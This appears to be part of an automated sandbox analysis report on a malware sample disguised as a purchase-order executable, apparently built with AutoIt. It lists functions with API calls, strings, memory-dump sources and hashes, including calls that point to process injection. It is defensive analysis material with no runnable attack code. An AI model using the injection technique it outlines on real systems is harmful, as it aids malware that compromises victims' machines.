                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Close$OpenQueryValue
                                                            • String ID: Control Panel\Mouse
                                                            • API String ID: 1607946009-824357125
                                                            • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                            • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                            • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                            • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                            Function 03FA12E8 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 03FA1AA3
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03FA1B39
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03FA1B5B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048696009.0000000003FA0000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3fa0000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                            • Instruction ID: 0597d246332575d307f9fe41af1ed5bfbe739949a0409308ba2cd7f37211fce6
                                                            • Opcode Fuzzy Hash: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                            • Instruction Fuzzy Hash: 98620A74A14618DBEB24CFA4C850BDEB376EF58300F1091A9D10DEB390E77A9E81CB59
                                                            Function 0040F570 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 247COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                            • _free.LIBCMT ref: 004295A0
                                                              • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                              • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                              • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                              • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                              • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                              • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                            • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\Desktop\Purchase order MIPO2425110032.exe
                                                            • API String ID: 3938964917-1684075321
                                                            • Opcode ID: b0d98879e08f1b192eac1cf85f4636748e7fbbb1ee9accd76bf3b0570c8a299c
                                                            • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                            • Opcode Fuzzy Hash: b0d98879e08f1b192eac1cf85f4636748e7fbbb1ee9accd76bf3b0570c8a299c
                                                            • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                            Function 0040BD80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: Error:
                                                            • API String ID: 4104443479-232661952
                                                            • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                            • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                            • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                            • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                            Function 0040F520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                              • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Purchase order MIPO2425110032.exe,0040F545,C:\Users\user\Desktop\Purchase order MIPO2425110032.exe,004A90E8,C:\Users\user\Desktop\Purchase order MIPO2425110032.exe,?,0040F545), ref: 0041013C
                                                              • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                              • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                              • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                              • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                              • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                              • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                            • String ID: X$pWH
                                                            • API String ID: 85490731-941433119
                                                            • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                            • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                            • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                            • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                            Function 00401B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • _memmove.LIBCMT ref: 00401B57
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                            • String ID: @EXITCODE
                                                            • API String ID: 2734553683-3436989551
                                                            • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                            • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                            • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                            • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                            Function 00410100 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • C:\Users\user\Desktop\Purchase order MIPO2425110032.exe, xrefs: 00410107
                                                            • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _strcat
                                                            • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\Desktop\Purchase order MIPO2425110032.exe
                                                            • API String ID: 1765576173-3479207982
                                                            • Opcode ID: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
                                                            • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                            • Opcode Fuzzy Hash: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
                                                            • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                            Function 00475077 Relevance: 4.9, APIs: 3, Instructions: 390COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: afcf258d4bd88d8ea756dbb23f6f5e28355c73968809c2117334dc7dbfffea7a
                                                            • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                            • Opcode Fuzzy Hash: afcf258d4bd88d8ea756dbb23f6f5e28355c73968809c2117334dc7dbfffea7a
                                                            • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                            Function 00414ABA Relevance: 4.7, APIs: 3, Instructions: 160COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                            • String ID:
                                                            • API String ID: 1794320848-0
                                                            • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                            • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                            • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                            • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                            Function 00475300 Relevance: 4.6, APIs: 3, Instructions: 141COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                            • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentTerminate
                                                            • String ID:
                                                            • API String ID: 2429186680-0
                                                            • Opcode ID: 0f578ce52da9f9b4c714c296b9d78fbd636f242c945bc8d5a468c0e4c8bdb3ba
                                                            • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                            • Opcode Fuzzy Hash: 0f578ce52da9f9b4c714c296b9d78fbd636f242c945bc8d5a468c0e4c8bdb3ba
                                                            • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                            Function 0040E0C0 Relevance: 4.6, APIs: 3, Instructions: 82windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_
                                                            • String ID:
                                                            • API String ID: 1144537725-0
                                                            • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                            • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                                            • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                            • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                                            Function 0043213D Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _malloc.LIBCMT ref: 0043214B
                                                              • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                              • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                              • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                            • _malloc.LIBCMT ref: 0043215D
                                                            • _malloc.LIBCMT ref: 0043216F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _malloc$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 680241177-0
                                                            • Opcode ID: f71c381a9a4e64bea8472010c286ed0a2169748a03ca4327bb91778eef0474c7
                                                            • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                            • Opcode Fuzzy Hash: f71c381a9a4e64bea8472010c286ed0a2169748a03ca4327bb91778eef0474c7
                                                            • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                            Function 004320F8 Relevance: 4.5, APIs: 3, Instructions: 25COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 0043210A
                                                              • Part of subcall function 00413748: RtlFreeHeap.NTDLL(00000000,00000000,?,00417A5A,00000000), ref: 0041375E
                                                              • Part of subcall function 00413748: GetLastError.KERNEL32(00000000,?,00417A5A,00000000), ref: 00413770
                                                            • _free.LIBCMT ref: 0043211D
                                                            • _free.LIBCMT ref: 00432130
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
                                                            • Instruction ID: d08fe22c6a524c27e4c6c7bcf1019f14b9a5eff3fc739cf1d41fcb720108e0a5
                                                            • Opcode Fuzzy Hash: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
                                                            • Instruction Fuzzy Hash: 29E092F290071433CD1099219941A87F38C4B15B11F08402AFA15A3301E969FA40C1E9
                                                            Function 00467897 Relevance: 3.2, APIs: 2, Instructions: 170COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __wsplitpath.LIBCMT ref: 004678F7
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast__wsplitpath_malloc
                                                            • String ID:
                                                            • API String ID: 4163294574-0
                                                            • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                            • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                            • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                            • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                            Function 0040F760 Relevance: 3.1, APIs: 2, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                              • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                              • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                            • _strcat.LIBCMT ref: 0040F786
                                                              • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                              • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                            • String ID:
                                                            • API String ID: 3199840319-0
